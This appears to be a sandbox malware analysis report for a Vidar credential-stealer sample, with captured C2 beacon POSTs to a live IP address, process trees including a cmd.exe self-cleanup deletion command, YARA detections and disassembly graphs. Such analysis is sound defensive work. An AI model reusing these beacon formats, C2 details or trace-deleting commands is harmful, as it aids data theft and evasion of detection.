                                                                                                                                                                                                                          Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------DBFCBGCGIJKJKECAKEGCCont
2024-10-23 15:06:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:35 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
2024-10-23 15:06:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49976 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:36 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-23 15:06:36 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------BAKFCBFHJDHJKECAKEHICont
2024-10-23 15:06:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:36 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
2024-10-23 15:06:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49987 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:06:37 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KEBFBGDGHIIJJKEBKJDB
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-23 15:06:37 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------KEBFBGDGHIIJJKEBKJDBCont
2024-10-23 15:06:38 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:38 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
2024-10-23 15:06:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:11:04:59
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\UMrFwHyjUi.exe"
                                                                                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5 hash:0D90EF55D1B1CB43CCB8FD30BBEBA1A4
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:11:05:00
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\UMrFwHyjUi.exe"
                                                                                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5 hash:0D90EF55D1B1CB43CCB8FD30BBEBA1A4
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:11:05:00
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\UMrFwHyjUi.exe"
                                                                                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5 hash:0D90EF55D1B1CB43CCB8FD30BBEBA1A4
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                          Start time:11:05:00
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272
                                                                                                                                                                                                                          Imagebase:0xb30000
                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                          Start time:11:06:37
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                          Start time:11:06:37
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:11:06:37
                                                                                                                                                                                                                          Start date:23/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                          Imagebase:0x480000
                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:0.7%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:8.2%
                                                                                                                                                                                                                            Total number of Nodes:233
                                                                                                                                                                                                                            Total number of Limit Nodes:4

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 170 192f7c-192fd5 GetPEB call 192805 call 192e7a VirtualProtect 175 193007-19300e 170->175 176 192fd7-192fef call 1949da 170->176 179 193011-193019 call 19277a 176->179 180 192ff1-192ff5 176->180 180->179 182 192ff7-193002 call 19315a 180->182 182->175
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(00222A60,000004E4,00000040,?), ref: 00192FD1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                            • Opcode ID: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction ID: 75013d7f6e6bfade49deb9388ac6ee612568bced2f33c097b6d74a02f7780193
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65110232204304AFE718EF24D801F6AB394FF58720F04081DF964873D2DBB1EA01C696

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 0 1ac9d4-1ac9ed 1 1ac9ef-1ac9ff call 1a3228 0->1 2 1aca03-1aca08 0->2 1->2 8 1aca01 1->8 4 1aca0a-1aca14 2->4 5 1aca17-1aca3d call 1acd7f 2->5 4->5 10 1aca43-1aca4e 5->10 11 1acbb0-1acbc1 call 199367 5->11 8->2 12 1acba3 10->12 13 1aca54-1aca59 10->13 17 1acba5 12->17 15 1aca5b-1aca64 call 1999f0 13->15 16 1aca6e-1aca79 call 1a7a23 13->16 25 1aca66-1aca6c 15->25 26 1aca84-1aca88 15->26 16->26 27 1aca7b 16->27 21 1acba7-1acbae call 1992af 17->21 21->11 29 1aca81 25->29 26->17 30 1aca8e-1acaa5 call 1acd7f 26->30 27->29 29->26 30->17 33 1acaab-1acabd call 1a762c 30->33 35 1acac2-1acac6 33->35 36 1acac8-1acad0 35->36 37 1acae1-1acae3 35->37 38 1acb0a-1acb16 36->38 39 1acad2-1acad7 36->39 37->17 42 1acb18-1acb1a 38->42 43 1acb95 38->43 40 1acb89-1acb8b 39->40 41 1acadd-1acadf 39->41 40->21 41->37 45 1acae8-1acb02 call 1a762c 41->45 46 1acb2f-1acb3a call 1a7a23 42->46 47 1acb1c-1acb25 call 1999f0 42->47 44 1acb97-1acb9e call 1992af 43->44 44->37 45->40 57 1acb08 45->57 46->44 56 1acb3c 46->56 47->44 58 1acb27-1acb2d 47->58 59 1acb42-1acb47 56->59 57->37 58->59 59->44 60 1acb49-1acb61 call 1a762c 59->60 60->44 63 1acb63-1acb6a 60->63 64 1acb6c-1acb6d 63->64 65 1acb8d-1acb93 63->65 66 1acb6e-1acb80 call 1acdfb 64->66 65->66 66->44 69 1acb82-1acb88 call 1992af 66->69 69->40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACA5B
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACB1C
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB83
                                                                                                                                                                                                                              • Part of subcall function 001A7A23: HeapAlloc.KERNEL32(00000000,001ADBAE,?,?,001ADBAE,00000220,?,?,?), ref: 001A7A55
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB98
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACBA8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                                                                                            • Opcode ID: f4e55c0187827c286ba41230a5c9b11633073d9e27f70300481628ce028c2b37
                                                                                                                                                                                                                            • Instruction ID: 2049c90d2803805c55e85fcce215a1b82170af550cb42916a5e99d39d37e1ab0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4e55c0187827c286ba41230a5c9b11633073d9e27f70300481628ce028c2b37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE51B4B660021AAFEF259F68CC82EBB7AA9EF56790F150128FD04E7151E775CD1087E0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 72 1addaa-1addd2 call 1ad8da 75 1adf9a-1adf9b call 1ad94b 72->75 76 1addd8-1addde 72->76 79 1adfa0-1adfa2 75->79 78 1adde1-1adde7 76->78 80 1adee9-1adf08 call 19aa90 78->80 81 1added-1addf9 78->81 83 1adfa3-1adfb1 call 199367 79->83 89 1adf0b-1adf10 80->89 81->78 84 1addfb-1ade01 81->84 87 1adee1-1adee4 84->87 88 1ade07-1ade13 IsValidCodePage 84->88 87->83 88->87 91 1ade19-1ade20 88->91 92 1adf4d-1adf57 89->92 93 1adf12-1adf17 89->93 94 1ade48-1ade55 GetCPInfo 91->94 95 1ade22-1ade2e 91->95 92->89 100 1adf59-1adf83 call 1ad89c 92->100 98 1adf4a 93->98 99 1adf19-1adf21 93->99 96 1ade57-1ade76 call 19aa90 94->96 97 1aded5-1adedb 94->97 101 1ade32-1ade3e call 1ad9ae 95->101 96->101 112 1ade78-1ade7f 96->112 97->75 97->87 98->92 105 1adf42-1adf48 99->105 106 1adf23-1adf26 99->106 111 1adf84-1adf93 100->111 108 1ade43 101->108 105->93 105->98 110 1adf28-1adf2e 106->110 108->79 110->105 113 1adf30-1adf40 110->113 111->111 114 1adf95 111->114 115 1adeab-1adeae 112->115 116 1ade81-1ade86 112->116 113->105 113->110 114->75 118 1adeb3-1adeba 115->118 116->115 117 1ade88-1ade90 116->117 119 1ade92-1ade99 117->119 120 1adea3-1adea9 117->120 118->118 121 1adebc-1aded0 call 1ad89c 118->121 122 1ade9a-1adea1 119->122 120->115 120->116 121->101 122->120 122->122
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001AD8DA: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 001AD905
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,001ADBF1,?,00000000,?,?,?), ref: 001ADE0B
                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,001ADBF1,?,00000000,?,?,?), ref: 001ADE4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 546120528-0
                                                                                                                                                                                                                            • Opcode ID: 690b15d4790ff3cf1c8cebcd2e962b42309502a43f4d13d97d9e0cade4c69278
                                                                                                                                                                                                                            • Instruction ID: 9943698eee7d04d1cff1c7d7fcc7c4dc865308aa9af6c524a68eda4e9562c01c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 690b15d4790ff3cf1c8cebcd2e962b42309502a43f4d13d97d9e0cade4c69278
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D510378A00B459EDB21DF75D881AABBBF4EFA3300F18406ED0838B952E7749946CB51

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 125 1a762c-1a763b call 1a71bb 128 1a763d-1a7662 LCMapStringEx 125->128 129 1a7664-1a767e call 1a7689 LCMapStringW 125->129 133 1a7684-1a7686 128->133 129->133
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LCMapStringEx.KERNELBASE(?,001ACAC2,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 001A7660
                                                                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,001ACAC2,?,?,00000000,?,00000000), ref: 001A767E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: String
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2568140703-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 134 1ad9ae-1ad9d0 135 1adae9-1adb0f 134->135 136 1ad9d6-1ad9e8 GetCPInfo 134->136 138 1adb14-1adb19 135->138 136->135 137 1ad9ee-1ad9f5 136->137 139 1ad9f7-1ada01 137->139 140 1adb1b-1adb21 138->140 141 1adb23-1adb29 138->141 139->139 144 1ada03-1ada16 139->144 145 1adb31-1adb33 140->145 142 1adb2b-1adb2e 141->142 143 1adb35 141->143 142->145 146 1adb37-1adb49 143->146 147 1ada37-1ada39 144->147 145->146 146->138 148 1adb4b-1adb59 call 199367 146->148 149 1ada3b-1ada72 call 1ac8cb call 1acbc2 147->149 150 1ada18-1ada1f 147->150 160 1ada77-1adaac call 1acbc2 149->160 152 1ada2e-1ada30 150->152 156 1ada32-1ada35 152->156 157 1ada21-1ada23 152->157 156->147 157->156 159 1ada25-1ada2d 157->159 159->152 163 1adaae-1adab8 160->163 164 1adaba-1adac4 163->164 165 1adac6-1adac8 163->165 166 1adad8-1adae5 164->166 167 1adaca-1adad4 165->167 168 1adad6 165->168 166->163 169 1adae7 166->169 167->166 168->166 169->148
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(E8458D00,?,001ADBFD,001ADBF1,00000000), ref: 001AD9E0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1807457897-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 186 1957e2-1957e7 187 1957ed-1957f4 KiUserExceptionDispatcher 186->187 188 19724e-19726a call 19717f call 19ad9b 186->188 187->188
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 001957EF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05B7
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05E0
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,001B083C,?,00000000), ref: 001B05F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001B07FF
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 001B0848
                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 001B0857
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001B089F
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001B08BE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
